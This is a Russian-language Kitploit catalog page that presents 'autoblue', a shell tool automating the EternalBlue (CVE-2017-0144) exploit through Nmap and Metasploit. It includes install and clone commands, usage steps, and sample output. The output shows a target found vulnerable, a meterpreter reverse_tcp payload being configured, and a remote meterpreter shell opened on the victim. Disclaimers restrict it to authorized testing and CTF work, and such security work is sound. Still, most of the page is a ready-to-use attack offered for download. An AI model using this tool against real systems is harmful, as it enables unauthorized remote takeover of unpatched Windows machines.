Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
autoblue — AutoBlue - Automated EternalBlue (CVE-2017-0144 / MS17-010) exploitation tool leveraging Nmap and Metasploit for ethical hacking, penetration testing, and CTF challenges. Strictly for authorized and educational use only! | Kitploit
Инструменты/GitHubGitHub/atithkhawas/autoblue
Vulnerability ScannersPayload GenerationExploitationPost-ExploitationCTFPenetration TestingLearning & EducationRed Teaming
GitHubatithkhawas/autoblue

autoblue

AutoBlue - Automated EternalBlue (CVE-2017-0144 / MS17-010) exploitation tool leveraging Nmap and Metasploit for ethical hacking, penetration testing, and CTF challenges. Strictly for authorized and educational use only!

Репозиторий
411 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

AUTOBLUE: Автоматизированный инструмент для эксплуатации уязвимости EternalBlue

AUTOBLUE — это инструмент автоматизации, предназначенный для эксплуатации уязвимости EternalBlue (CVE-2017-0144) на машинах Windows. Инструмент объединяет возможности Nmap для сканирования уязвимостей и Metasploit's msfconsole для эксплуатации, позволяя пользователям автоматически выявлять уязвимые системы и запускать эксплойт EternalBlue для получения удаленного доступа к цели.

Этот инструмент в первую очередь предназначен для специалистов по безопасности, пентестеров и этичных хакеров, работающих в контролируемых, авторизованных средах, таких как задачи Capture The Flag (CTF), тестирование на проникновение или лабораторные настройки. AUTOBLUE позволяет пользователям эксплуатировать уязвимость EternalBlue с минимальным ручным вмешательством — достаточно просто ввести IP-адрес цели.

Возможности

  • Автоматизированное сканирование уязвимостей: Использует Nmap для поиска уязвимости EternalBlue (CVE-2017-0144) на целевой машине.

  • Бесшовная эксплуатация: Использует Metasploit's msfconsole для автоматического запуска эксплойта EternalBlue.

  • Простая настройка: Требуется только IP-адрес цели и рабочая среда с установленными Nmap и Metasploit.

  • Отчет о результатах: Генерирует вывод, указывающий на успех или неудачу попытки эксплуатации.

Содержание

  • Предварительные требования
  • Установка
  • Использование
  • Как это работает
  • Соображения безопасности
  • Вклад в проект
  • Лицензия
  • Благодарности
  • Отказ от ответственности

Предварительные требования:

Перед использованием AUTOBLUE убедитесь, что на вашей машине установлены следующие инструменты:

Nmap: Инструмент для сканирования сети, чтобы обнаруживать уязвимые машины.

Metasploit Framework: Платформа для тестирования на проникновение, содержащая эксплойты для EternalBlue.

Установка Nmap:

  • В Linux (на основе Debian):

Копировать код

root@kitploit:~
      sudo apt update

и

root@kitploit:~
      sudo apt install nmap

В Windows или macOS загрузите Nmap с официального сайта.

Установка Metasploit:

В Linux (на основе Debian):

Копировать код

root@kitploit:~
      sudo apt update

и

root@kitploit:~
     sudo apt install metasploit-framework
     

В Windows или macOS загрузите Metasploit с официального сайта.

Установка:

Чтобы установить AUTOBLUE, выполните следующие шаги:

  • Клонируйте репозиторий:

    root@kitploit:~
      git clone https://github.com/AtithKhawas/autoblue.git
    

    и

    root@kitploit:~
         cd autoblue
    

Убедитесь, что Nmap и Metasploit правильно установлены как предварительные требования.

  • Сделайте скрипт исполняемым:

    root@kitploit:~
    chmod +x autoblue.sh
    

Использование:

AUTOBLUE предназначен для автоматизации сканирования и эксплуатации уязвимости EternalBlue. Вот как его использовать:

  • Запустите инструмент

Чтобы использовать AUTOBLUE, выполните следующую команду в терминале:

Копировать код

root@kitploit:~
     ./autoblue.sh 

Вывод:

root@kitploit:~
     ┌──(root㉿kali)-[/home/Elliot] 
     └─# ./autoblue.sh 
     ============================================
     ********************************************
     AutoBlue    - EternalBlue Exploit Automation
     ********************************************
     ********************************************
     ------------------------Made by ATITH KHAWAS
     ============================================
     Enter Target IP Address:

Будет запрошен IP-адрес цели и ваш IP-адрес.

Пример

root@kitploit:~
      Enter Target IP Address: Target<IP Address>
      Enter Your IP Address: Your <IP Address>

После запуска инструмента начнется сканирование с помощью Nmap:

Вывод-1

root@kitploit:~
 Target IP Address: ***.***.**.**
 [+] Scanning Target for MS17-010 Vulnerability...
 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-30 12:41 EST
 Nmap scan report for ***.***.**.**
 Host is up (0.19s latency).

 PORT    STATE SERVICE
 445/tcp open  microsoft-ds

 Host script results:
 | smb-vuln-ms17-010: 
 |   VULNERABLE:
 |   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
 |     State: VULNERABLE
 |     IDs:  CVE:CVE-2017-0143
 |     Risk factor: HIGH
 |       A critical remote code execution vulnerability exists in Microsoft SMBv1
 |        servers (ms17-010).
 |           
 |     Disclosure date: 2017-03-14
 |     References:
 |       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
 |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
 |_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

 Nmap done: 1 IP address (1 host up) scanned in 2.40 seconds
 [+] Target is VULNERABLE to EternalBlue!

Здесь начинается настоящая работа, значительно сокращающая трудоемкий процесс. Если цель уязвима, автоматически запускается Msfconsole и устанавливаются RHOSTS, PAYLOAD, LHOST и LPORT с портом по умолчанию 4444.

Вывод-2

root@kitploit:~
      [+] Launching Metasploit...
      [*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
      RHOSTS => ***.***.**.**
      PAYLOAD => windows/x64/meterpreter/reverse_tcp
      LHOST => ***.***.**.**
      LPORT => 4444
      [*] Started reverse TCP handler on ***.***.**.**:4444 

И предоставляет нам оболочку Meterpreter цели.

Вывод-3

root@kitploit:~
       [+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
       [+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
       [+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

       meterpreter > pwd
       C:\Windows\system32

Как это работает:

  • Сканирование с помощью Nmap Script: Инструмент сначала использует Nmap Script Scan (--script smb-vuln-ms17-010) для обнаружения, уязвима ли целевая машина к эксплойту EternalBlue. Он проверяет, открыт ли порт 445, и пытается выявить уязвимости SMB.

  • Эксплойт Metasploit: Если целевая машина найдена уязвимой, AUTOBLUE переходит к запуску эксплойта EternalBlue с помощью Metasploit's msfconsole. Скрипт настраивает и отправляет необходимый пейлоуд для эксплуатации уязвимости.

  • Обратная оболочка: Если эксплойт успешен, открывается обратная оболочка, предоставляющая интерфейс командной строки на машине жертвы.

  • Обратная связь: Инструмент предоставляет обратную связь в процессе работы, включая информацию о том, была ли цель успешно эксплуатирована, и выводит любые соответствующие сведения (например, IP-адрес обратной оболочки).

Соображения безопасности:

  • Законное использование: Этот инструмент следует использовать только в авторизованных средах. Убедитесь, что у вас есть явное разрешение на тестирование целевой машины и что это не запрещено законом в вашей юрисдикции.

  • Пользовательский ввод: Убедитесь, что в инструмент вводятся только доверенные IP-адреса, чтобы предотвратить неправильное использование. Запуск этого инструмента на недоверенных системах может привести к инцидентам безопасности.

  • Безопасность пейлоуда: Пейлоуд обратной оболочки, используемый в этом инструменте, по своей сути рискован. Не подвергайте атакующую машину или ее слушатели воздействию недоверенных сетей.

  • Обновляйте зависимости: Регулярно обновляйте Nmap и Metasploit, чтобы смягчить известные уязвимости безопасности в этих инструментах.

Вклад в проект:

Вклад в проект AUTOBLUE приветствуется. Если у вас есть предложения, улучшения или исправления ошибок, не стесняйтесь форкать репозиторий и создавать запрос на слияние.

Лицензия:

Этот инструмент является открытым исходным кодом и распространяется под лицензией MIT. Вы можете свободно использовать, изменять и распространять программное обеспечение в своих проектах. Однако вы должны включить это уведомление во все копии или существенные части программного обеспечения.

Благодарности:

  • Nmap: За предоставление функциональности сканирования уязвимостей.

  • Metasploit: За предоставление платформы для эксплуатации уязвимости EternalBlue.

  • Исследователи безопасности: За обнаружение и публичное раскрытие уязвимости EternalBlue, что помогло защитить системы по всему миру.

Отказ от ответственности:

AUTOBLUE — это инструмент, предназначенный только для образовательного и этического использования. Авторы не несут ответственности за любые незаконные действия, совершенные с использованием этого инструмента. Ваша обязанность — убедиться, что у вас есть явное разрешение на проведение тестов на проникновение в любой системе.

Используйте этот инструмент на свой страх и риск. Всегда проводите тестирование на проникновение в безопасной и законной среде.

Скачать инструмент